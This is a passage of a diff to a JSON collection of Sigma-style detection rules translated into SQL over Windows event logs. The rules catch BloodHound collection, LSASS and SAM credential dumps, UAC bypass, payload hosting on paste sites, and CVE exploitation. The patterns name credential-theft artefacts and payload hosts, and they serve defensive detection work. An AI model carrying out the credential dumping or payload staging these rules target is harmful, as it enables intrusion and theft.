Add addional filters or reduce level depending on the level of noise" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" + "filename": "file_event_win_bloodhound_collection.yml" }, { - "title": "SCM Database Privileged Operation", - "id": "dae8171c-5ec6-4396-b210-8466585b53e9", - "status": "test", - "description": "Detects non-system users performing privileged operation os the SCM database", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "CVE-2022-24527 Microsoft Connected Cache LPE", + "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "status": "experimental", + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + 
"attack.t1059.001", + "cve.2022.24527" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4674' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'servicesactive' AND PrivilegeList = 'SeTakeOwnershipPrivilege') AND NOT (SubjectLogonId = '0x3e4' AND ProcessName LIKE '%:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\'))" - ], - "filename": "win_security_scm_database_privileged_operation.yml" - }, - { - "title": "Failed Logon From Public IP", - "id": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", - "status": "test", - "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", - "author": "NVISO", - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.t1078", - "attack.t1190", - "attack.t1133" - ], - "falsepositives": [ - "Legitimate logon attempts over the internet", - "IPv4-to-IPv6 mapped IPs" - ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND NOT ((IpAddress LIKE '%-%' ESCAPE '\\') OR ((IpAddress LIKE '10.%' ESCAPE '\\' OR IpAddress LIKE '192.168.%' ESCAPE '\\' OR IpAddress LIKE '172.16.%' ESCAPE '\\' OR IpAddress LIKE '172.17.%' ESCAPE '\\' OR IpAddress LIKE '172.18.%' ESCAPE '\\' OR IpAddress LIKE '172.19.%' ESCAPE '\\' OR IpAddress LIKE '172.20.%' ESCAPE '\\' OR IpAddress LIKE '172.21.%' ESCAPE '\\' OR IpAddress LIKE '172.22.%' ESCAPE '\\' OR IpAddress LIKE '172.23.%' ESCAPE '\\' OR IpAddress LIKE '172.24.%' ESCAPE '\\' OR IpAddress LIKE '172.25.%' ESCAPE '\\' OR IpAddress LIKE '172.26.%' ESCAPE '\\' OR IpAddress LIKE '172.27.%' ESCAPE '\\' OR IpAddress LIKE '172.28.%' ESCAPE '\\' OR IpAddress LIKE '172.29.%' ESCAPE '\\' OR IpAddress LIKE '172.30.%' ESCAPE '\\' OR IpAddress LIKE '172.31.%' ESCAPE '\\' OR IpAddress LIKE '127.%' ESCAPE '\\' OR IpAddress LIKE '169.254.%' ESCAPE '\\')) OR (IpAddress = '::1' OR (IpAddress LIKE 
'fe80::%' ESCAPE '\\' OR IpAddress LIKE 'fc00::%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_susp_failed_logon_source.yml" + "filename": "file_event_win_cve_2022_24527_lpe.yml" }, { - "title": "Device Installation Blocked", - "id": "c9eb55c3-b468-40ab-9089-db2862e42137", + "title": "UAC Bypass Using EventVwr", + "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Detects an installation of a device that is forbidden by the system policy", - "author": "frack113", - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '6423')" - ], - "filename": "win_security_device_installation_blocked.yml" - }, - { - "title": "Password Dumper Activity on LSASS", - "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "status": "test", - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "author": "sigma", + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_lsass_dump.yml" + "filename": "file_event_win_uac_bypass_eventvwr.yml" }, { - "title": "Successful Overpass the Hash Attempt", - "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "title": "ScreenConnect Temporary Installation Artefact", + "id": "fec96f39-988b-4586-b746-b93d59fd1922", "status": "test", - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Runas command-line tool using /netonly parameter" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Bin\\\\ScreenConnect.%' ESCAPE '\\')" ], - "filename": "win_security_overpass_the_hash.yml" + "filename": "file_event_win_screenconnect_artefact.yml" }, { - "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", - "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", - "status": "test", - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Writing Local Admin Share", + "id": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", + "status": "experimental", + "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.lateral_movement", + "attack.t1546.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\\\\\127.0.0%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\')" ], - "filename": 
"win_security_new_or_renamed_user_account_with_dollar_sign.yml" + "filename": "file_event_win_writing_local_admin_share.yml" }, { - "title": "Ngrok Usage with Remote Desktop Service", - "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", + "title": "WScript or CScript Dropper - File", + "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "status": "experimental", - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "author": "Tim Shelton", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_terminalservices_rdp_ngrok.yml" + "filename": "file_event_win_cscript_wscript_dropper.yml" }, { - "title": "New Firewall Rule Added In Windows Firewall Exception List", - "id": "cde0a575-7d3d-4a49-9817-b8004a7bf105", + "title": "UEFI Persistence Via Wpbbin - FileCreation", + "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", "status": "experimental", - "description": "Detects when a rule has been added to the Windows Firewall exception list", - "author": "frack113", - 
"level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2004' AND NOT ((Action = '2') OR ((ApplicationPath LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ApplicationPath LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\Setup.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\dllhost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. 
Which could be indicative of UEFI based persistence method", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], - "filename": "win_firewall_as_add_rule.yml" - }, - { - "title": "New Firewall Exception Rule Added For A Suspicious Folder", - "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", - "status": "experimental", - "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", - "author": "frack113", "falsepositives": [ - "Any legitimate application that runs from the AppData user directory" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2') OR ((ApplicationPath LIKE '%AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "win_firewall_as_add_rule_susp_folder.yml" + "filename": "file_event_win_wpbbin_persistence.yml" }, { - "title": "A Rule Has Been Deleted From The Windows Firewall Exception List", - "id": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", - "status": "experimental", - "description": "Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall", - "author": "frack113", + "title": "Startup Folder File 
Write", + "id": "2aa0a6b4-a865-495b-ab51-c28249537b75", + "status": "test", + "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "falsepositives": [ + "FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2006' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp%' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\'))" ], - "filename": "win_firewall_as_delete_rule.yml" + "filename": "file_event_win_startup_folder_file_write.yml" }, { - "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", - "id": "79609c82-a488-426e-abcf-9f341a39365d", - "status": "experimental", - "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", - "author": "frack113, Nasreddine Bencherchali", + "title": "Suspicious Desktopimgdownldr Target File", + "id": 
"fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "status": "test", + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1105" + ], + "falsepositives": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2033' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" ], - "filename": "win_firewall_as_delete_all_rules.yml" + "filename": "file_event_win_susp_desktopimgdownldr_file.yml" }, { - "title": "Suspicious Remote AppX Package Locations", - "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "title": "WerFault LSASS Process Memory Dump", + "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", - "author": "Nasreddine 
Bencherchali (Nextron Systems)", + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_domains.yml" + "filename": "file_event_win_lsass_werfault_dump.yml" }, { - "title": "Deployment Of The AppX Package Was Blocked By The Policy", - "id": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", + "title": "Potential SAM Database Dump", + 
"id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "status": "experimental", - "description": "Detects an appx package deployment that was blocked by the local computer policy", - "author": "frack113", + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Rare cases of administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('441', '442', '453', '454'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\')))" ], - "filename": "win_appxdeployment_server_policy_block.yml" + "filename": 
"file_event_win_sam_dump.yml" }, { - "title": "Suspicious AppX Package Installation Attempt", - "id": "898d5fc9-fbc3-43de-93ad-38e97237c344", + "title": "Suspicious File Created Via OneNote Application", + "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", "status": "experimental", - "description": "Detects an appx package installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements and could be suspicious", + "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Legitimate AppX packages not signed by MS used part of an enterprise" + "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", + "Occasional FPs might occur if OneNote is used internally to share different embedded documents" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '401' AND ErrorCode = '0x80073cff')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR 
TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_appx_package_installation.yml" + "filename": "file_event_win_office_onenote_susp_dropped_files.yml" }, { - "title": "Deployment AppX Package Was Blocked By AppLocker", - "id": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", + "title": "Windows Binaries Write Suspicious Extensions", + "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "status": "experimental", - "description": "Detects an appx package deployment that was blocked by AppLocker policy", - "author": "frack113", - "tags": [ - "attack.defense_evasion" - ], + "description": "Detects windows executables that writes files with suspicious extensions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '412')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\'))))" ], - "filename": "win_appxdeployment_server_applocker_block.yml" + "filename": "file_event_win_shell_write_susp_files_extensions.yml" }, { - "title": "Potential Malicious AppX Package Installation Attempts", - "id": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", - "status": "experimental", - "description": "Detects potential installation or installation attempts of known malicious appx packages", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", + "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", + "status": "test", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('400', '401') AND PackageFullName LIKE '%3669e262-ec02-4e9d-bcb4-3d008b4afac9%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE 
